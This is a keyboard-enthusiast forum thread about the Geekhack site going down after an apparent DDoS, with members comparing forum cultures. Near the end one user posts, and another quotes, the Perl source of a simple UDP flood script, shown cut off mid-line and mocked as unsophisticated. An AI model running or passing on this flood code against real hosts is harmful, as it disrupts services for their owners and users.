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Re: Is GeekWhack down?

Posted: 26 Jun 2015, 21:53
by jbondeson
photekq wrote:I think it's a combination of a lot of things, with one of the big ones being novelty keycaps and the drama/idiocy that surrounds them.
Yeah, novelty-hysteria has latched onto the GH brain stem.

Artificial scarcity, and obsessive collectors, what could possibly go wrong?

It's like reliving 1990s beanie baby fever...

Posted: 26 Jun 2015, 22:19
by baldgye
jbondeson wrote: It's like reliving 1990s beanie baby fever...
beanie baby's are awesome wtf

Posted: 26 Jun 2015, 22:49
by CLiB
man, i haven't posted here in forever...

with GH down, how else can i waste time at work? serious question...

Posted: 26 Jun 2015, 22:53
by Muirium
GH downtime = more exclusive uptime.

Through the looking glass here, people.

Posted: 26 Jun 2015, 22:56
by derzemel
CLiB wrote: man, i haven't posted here in forever...

with GH down, how else can i waste time at work? serious question...
You could waste your time around these parts, with the hardcore collectors (not me, I'm still fumbling around :P )

Posted: 26 Jun 2015, 22:59
by Muirium
Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

First of all though: where's your monocle? This is DT, gentlemen!

Posted: 26 Jun 2015, 23:16
by kebby
Muirium wrote: Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

First of all though: where's your monocle? This is DT, gentlemen!
Thanks! That's exactly what I've longed for. GH wouldn't happen to have a similar feature, would it?

This downtime is starting to be considerable.

Re: Is GeekWhack down?

Posted: 26 Jun 2015, 23:36
by jbondeson
baldgye wrote: beanie baby's are awesome wtf
People can ruin anything.

Posted: 26 Jun 2015, 23:42
by scottc
derzemel wrote:
CLiB wrote: man, i haven't posted here in forever...

with GH down, how else can i waste time at work? serious question...
You could waste your time around these parts, with the hardcore collectors (not me, I'm still fumbling around :P )
Fumbling around with TWO DOLCH KEYBOARDS?!? And in rare layouts, no less!

Posted: 26 Jun 2015, 23:55
by webwit
I've heard that the best way to help GH get back up is to go there and press F5 continuously. The winning F5 kickstart will get free keycaps! *pokerface*

Posted: 27 Jun 2015, 00:03
by SL89
kebby wrote:
Muirium wrote: Try the forum spy. We have less threads around here but they're generally pretty busy and informative.

First of all though: where's your monocle? This is DT, gentlemen!
Thanks! That's exactly what I've longed for. GH wouldn't happen to have a similar feature, would it?

This downtime is starting to be considerable.
GH has had this feature as long as I've been around.

Posted: 27 Jun 2015, 00:30
by kebby
SL89 wrote: GH has had this feature as long as I've been around.
That's nice. Just didn't know the term I needed to look for to find it previously. Took a look at a pre-downtime tab that has GH open and yeah, it does seem to have a "Spy" on the menu.

Posted: 27 Jun 2015, 00:44
by BlueBär
photekq wrote: Seriously, GH is about 95% cancer. It's gone up from about 50% in the space of just a few months!

Posted: 27 Jun 2015, 01:12
by SL89
kebby wrote:
SL89 wrote: GH has had this feature as long as I've been around.
That's nice. Just didn't know the term I needed to look for to find it previously. Took a look at a pre-downtime tab that has GH open and yeah, it does seem to have a "Spy" on the menu.
I did the same thing on both sites, I didn't even know what the term Spy meant. :lol:

Posted: 27 Jun 2015, 01:13
by Redmaus
I am actually from reddit also, but I made sure my cancerous tumor stayed there.

Now I am a proper gentleman here at DT.

Posted: 27 Jun 2015, 01:21
by pyrelink
I came from Reddit simply because it was the first link that I found on Google when searching for a way to identify a few old keyboards that I had found. I stuck around for about a year or so and close to dropped interest in the hobby as all I wanted was to learn and uncover vintage keyboards, and all I could see at GH was money and drama, and Reddit was for showing off, and bad at retaining significant discussion. I only wound up visiting DT as a last resort after I reread a PM conversation I had with Haata on Reddit, about the first keyboard I posted. Sure glad I did.

Posted: 27 Jun 2015, 02:58
As a seller I like that there is money at GH. :evilgeek:

Seriously, though, if you want updates on GH please check this Twitter page. Apparently they were hit by a big DDOS today.

I'm hanging out on #geekhack and #deskthority just for fun.

Posted: 27 Jun 2015, 03:51
by SL89
XMIT wrote: As a seller I like that there is money at GH. :evilgeek:

Seriously, though, if you want updates on GH please check this Twitter page. Apparently they were hit by a big DDOS today.

I'm hanging out on #geekhack and #deskthority just for fun.
Yay IRC! It gets lonely but we have a different core group across all the channels including #mechboards

Also it seems like Money = GH which seems to be the only reason why some 'vendors' and their captive audience have any reason to be on there.

And lol at the DDOS.

Posted: 27 Jun 2015, 03:53
by kebby
So because of a DDOS they're... voluntarily out of service until further notice. :? Guess that's a very successful DDOS then.

Posted: 27 Jun 2015, 04:02
SL89 wrote: Also it seems like Money = GH which seems to be the only reason why some 'vendors' and their captive audience have any reason to be on there.
TBF I don't consider myself a vendor even though Keypocalypse is on the Vendors forum. I'm just another hobbyist helping a friend sell some keyboards. It just so happens that the friend is elecplus and "some" is "hundreds of".

Posted: 27 Jun 2015, 05:48
by SL89
Less so you XMIT and more so others with less altruistic reasons.

Posted: 27 Jun 2015, 06:35
by Hak Foo
It definitely seems like the two forums developed their own personality. There's much more of a vintage-collector focus here, and much less of a "Look at the new shiny, or the new keycaps for the new shiny".

Posted: 27 Jun 2015, 06:42
by rsbseb
Deskthority definitely has more of an academic personality to it. I personally find the site easier to navigate and read than GH. Plenty of good things over at GH but DT is certainly more comfortable for me, GH can be a good place to visit but this is home.

Posted: 27 Jun 2015, 07:39
by Blaise170
I like the atmosphere here but there aren't very many news posts whenever I visit. How else am I going to get that post count?

Posted: 27 Jun 2015, 08:19
by fanpeople
So Googled what happened to GH and got this Youtube video...

Maby he should go outside and throw a ball for the dog or something instead. I feel like he used his proper Youtube channel with lots of pers details.

Well I am going to go outside and throw the ball of the dog now.

Posted: 27 Jun 2015, 08:52
by hwood34
pyrelink wrote: I came from Reddit simply because it was the first link that I found on Google when searching for a way to identify a few old keyboards that I had found. I stuck around for about a year or so and close to dropped interest in the hobby as all I wanted was to learn and uncover vintage keyboards, and all I could see at GH was money and drama, and Reddit was for showing off, and bad at retaining significant discussion. I only wound up visiting DT as a last resort after I reread a PM conversation I had with Haata on Reddit, about the first keyboard I posted. Sure glad I did.
Oh yeah I really do wonder what happened to GH to make it go downhill. Certainly has nothing to do with the flood of redditors with asking the same stupid questions again and again and filling up the boards with shit.

(not all of you are bad but...)

Posted: 27 Jun 2015, 08:59
by hwood34
Hak Foo wrote: It definitely seems like the two forums developed their own personality. There's much more of a vintage-collector focus here, and much less of a "Look at the new shiny, or the new keycaps for the new shiny".
Yeah, even if you don't browse it much, you can at least appreciate the wealth of information on this site

Posted: 27 Jun 2015, 10:26
by jacobolus
Deskthority is more about buying and restoring keyboards from the 60s–80s; Geekhack is more about modding and building new things, plus a bunch of silly keycaps that wish they were figurines. Deskthority is dominated by Europeans, while Geekhack is mostly Americans. My guess is that the Geekhack community skews slightly younger, and my general impression is that Deskthority is a bit grumpier overall, while Geekhack tolerates more nonsense. But obviously there is significant overlap between the two. Geekhack has higher traffic and more contributors, making most discussions there more active, and the range of interests and ideas a bit broader. Reddit is mostly American teenagers with a small number of token adults, and as a result conversations tend to be filled with bad jokes, misinformation, and lots of drama, but also lots of enthusiasm. (Nothing inherently wrong with that, teenagers need somewhere to hang out too.)

Posted: 27 Jun 2015, 10:31
by webwit
That script seems a bit peculiar, I was expecting something more sophisticated. That's no DDoS, but a stupid one-on-one wrestling match. I hope his cheap ISP router didn't catch fire. Such a silly attack shouldn't be getting past any firewall.

Code: Select all


# PwNy<----

use Socket;
use strict;

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print <<EOTEXT;

oooooo   oooooo     oooo  o8o  oooooooooooo  o8o  
 `888.    `888.     .8'   `"'  `888'     `8  `"'  
  `888.   .8888.   .8'   oooo   888         oooo  
   `888  .8'`888. .8'    `888   888oooo8    `888  
    `888.8'  `888.8'      888   888    "     888  
     `888'    `888'       888   888          888  
      `8'      `8'       o888o o888o        o888o 

ooooo      ooo  o8o  ooooooo  ooooo 
`888b.     `8'  `"'   `8888    d8'  
 8 `88b.    8  oooo     Y888..8P    
 8   `88b.  8  `888      `8888'     
 8     `88b.8   888     .8PY888.    
 8       `888   888    d8'  `888b   
o8o        `8  o888o o888o  o88888o

 Welcome to Doxem NIX<3 - WhEn IN DoUbt KnoCk Em OuT, gEt SmAcKeD ChEeSe 
DiCk DoS Coded by:Doxem

print "~Doxem  NiX ShiT oN~ $ip " . ($port ? $port : "random") . " 
ResPecT WiFi" .
  ($size ? "$size-byte" : "THIS BOOUTER DONT WORK :(...O SHIT CALL 911 HIS MODEM ON FIRE!!") . " 
~Doxem~ ~i'LL SlAp TiLL YoU CrY~ " .
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500000-64)+64) ;
  $pport = $port ? $port : int(rand(1500000))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, 

Posted: 27 Jun 2015, 10:40
by scottc
webwit wrote: That script seems a bit peculiar, I was expecting something more sophisticated. That's no DDoS, but a stupid one-on-one wrestling match. I hope his cheap ISP router didn't catch fire. Such a silly attack shouldn't be getting past any firewall.

Code: Select all


# PwNy<----

use Socket;
use strict;

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 100);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print <<EOTEXT;

oooooo   oooooo     oooo  o8o  oooooooooooo  o8o  
 `888.    `888.     .8'   `"'  `888'     `8  `"'  
  `888.   .8888.   .8'   oooo   888         oooo  
   `888  .8'`888. .8'    `888   888oooo8    `888  
    `888.8'  `888.8'      888   888    "     888  
     `888'    `888'       888   888          888  
      `8'      `8'       o888o o888o        o888o 

ooooo      ooo  o8o  ooooooo  ooooo 
`888b.     `8'  `"'   `8888    d8'  
 8 `88b.    8  oooo     Y888..8P    
 8   `88b.  8  `888      `8888'     
 8     `88b.8   888     .8PY888.    
 8       `888   888    d8'  `888b   
o8o        `8  o888o o888o  o88888o

 Welcome to Doxem NIX<3 - WhEn IN DoUbt KnoCk Em OuT, gEt SmAcKeD ChEeSe 
DiCk DoS Coded by:Doxem

print "~Doxem  NiX ShiT oN~ $ip " . ($port ? $port : "random") . " 
ResPecT WiFi" .
  ($size ? "$size-byte" : "THIS BOOUTER DONT WORK :(...O SHIT CALL 911 HIS MODEM ON FIRE!!") . " 
~Doxem~ ~i'LL SlAp TiLL YoU CrY~ " .
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1500000-64)+64) ;
  $pport = $port ? $port : int(rand(1500000))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, 
Wow. That's shocking. There's more shitty "hacker text" than actual code. Though... I wouldn't be entirely surprised.